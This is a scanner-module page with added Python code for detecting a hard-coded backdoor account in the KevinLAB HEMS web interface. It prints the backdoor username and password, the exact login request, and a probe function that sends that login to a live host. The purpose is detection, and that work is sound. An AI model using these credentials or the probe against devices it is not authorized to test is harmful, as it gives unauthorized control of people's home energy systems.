
KevinLAB HEMS - Backdoor Detection

By kannthu

Critical
Vidoc Module
#kevinlab #default-login #backdoor
Description

What is the "KevinLAB HEMS - Backdoor Detection" module?

The "KevinLAB HEMS - Backdoor Detection" module detects an undocumented, hard-coded backdoor account in the KevinLAB Home Energy Management System (HEMS) web interface. It targets the KevinLAB HEMS software and is rated critical severity. The detection template was authored by gy741.

Impact

If the backdoor account is present and the login endpoint is reachable, an attacker needs no prior access: logging in with the hard-coded credentials yields an authenticated session on the HEMS, which can then be used for unauthorized control and manipulation of the system.

How does the module work?

The module sends a single HTTP POST to the HEMS login handler, carrying the backdoor account's username and password as form fields, i.e. an ordinary login attempt. It then applies four matching conditions to the response, all of which must hold, to decide whether the backdoor account exists and the login succeeded.

Example HTTP request:

POST /dashboard/proc.php?type=login HTTP/1.1
Host: <Hostname>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Connection: close

userid=kevinlab&userpass=kevin003

The module's matching conditions include:

- The response body contains the HTML tag <meta http-equiv="refresh" content="0; url=/>" (the post-login redirect to the dashboard)
- The response body does NOT contain <script> alert (the marker of a login-error page)
- The response headers contain PHPSESSID (a PHP session cookie was issued)
- The HTTP response status code is 200

Only if all four conditions are met does the module report the backdoor account as present. The negative matcher on <script> alert is what keeps a failed login from being reported: a 200 status and a session cookie on their own are not treated as a finding, since the device may issue both on the error page as well.
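The following is an added example, not the Vidoc module's or the template author's own code, that reproduces the request and the four-way AND of the matchers in Python. The request path, form fields and matcher strings are the ones quoted above; the `requests` library is assumed to be available for the live probe, and the three sample responses at the bottom are constructed here to exercise the matcher offline (they are not captured from a real device).

```python
"""Offline-testable reproduction of the backdoor-detection logic."""
from dataclasses import dataclass
from typing import Mapping

# Request details quoted on the page.
LOGIN_PATH = "/dashboard/proc.php?type=login"
BACKDOOR_FORM = {"userid": "kevinlab", "userpass": "kevin003"}

# Matcher strings exactly as listed on the page.
REFRESH_TAG = '<meta http-equiv="refresh" content="0; url=/>'
FAILURE_MARKER = "<script> alert"
SESSION_MARKER = "PHPSESSID"


@dataclass
class Response:
    """Minimal view of an HTTP response so the matcher runs on captured data."""
    status: int
    headers: Mapping[str, str]
    body: str


def header_blob(headers: Mapping[str, str]) -> str:
    """Flatten headers to one string, like a part: header word matcher."""
    return "\n".join(f"{name}: {value}" for name, value in headers.items())


def matches_backdoor(resp: Response) -> bool:
    """AND of the four conditions: word, NOT word, header word, status 200."""
    return (
        REFRESH_TAG in resp.body
        and FAILURE_MARKER not in resp.body
        and SESSION_MARKER in header_blob(resp.headers)
        and resp.status == 200
    )


def probe(base_url: str, timeout: float = 10.0) -> bool:
    """Send the login attempt to a live host and evaluate the matchers.

    `requests` is assumed to be installed; it is imported lazily so the
    matcher itself has no third-party dependency. Redirect following is
    disabled so the login handler's own body is what gets inspected.
    """
    import requests

    r = requests.post(
        base_url.rstrip("/") + LOGIN_PATH,
        data=BACKDOOR_FORM,
        headers={"Accept-Encoding": "gzip, deflate", "Connection": "close"},
        timeout=timeout,
        allow_redirects=False,
    )
    return matches_backdoor(Response(r.status_code, dict(r.headers), r.text))


# Constructed sample responses for offline checks (not real device output).
SUCCESS_SAMPLE = Response(
    200,
    {"Content-Type": "text/html", "Set-Cookie": "PHPSESSID=c0ffee; path=/"},
    "<html><head>" + REFRESH_TAG + "</head></html>",
)
# Error page: cookie and 200 present, but the alert marker must veto it.
FAILURE_SAMPLE = Response(
    200,
    {"Content-Type": "text/html", "Set-Cookie": "PHPSESSID=c0ffee; path=/"},
    "<html><body><script> alert('login failed');</script></body></html>",
)
# Redirect tag present but no session cookie issued: not a match either.
NO_COOKIE_SAMPLE = Response(200, {"Content-Type": "text/html"}, REFRESH_TAG)

if __name__ == "__main__":
    for name, sample in (("success", SUCCESS_SAMPLE),
                         ("failure", FAILURE_SAMPLE),
                         ("no-cookie", NO_COOKIE_SAMPLE)):
        print(f"{name}: {matches_backdoor(sample)}")
```

`probe("http://<Hostname>")` runs the check against a live system; `matches_backdoor` can be pointed at a saved response from a proxy or packet capture instead, which is the safer way to validate the logic before scanning production equipment.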

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: <meta http-equiv="refresh" content="0; u... AND
NOT word: <script> alert AND
word: PHPSESSID AND
status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability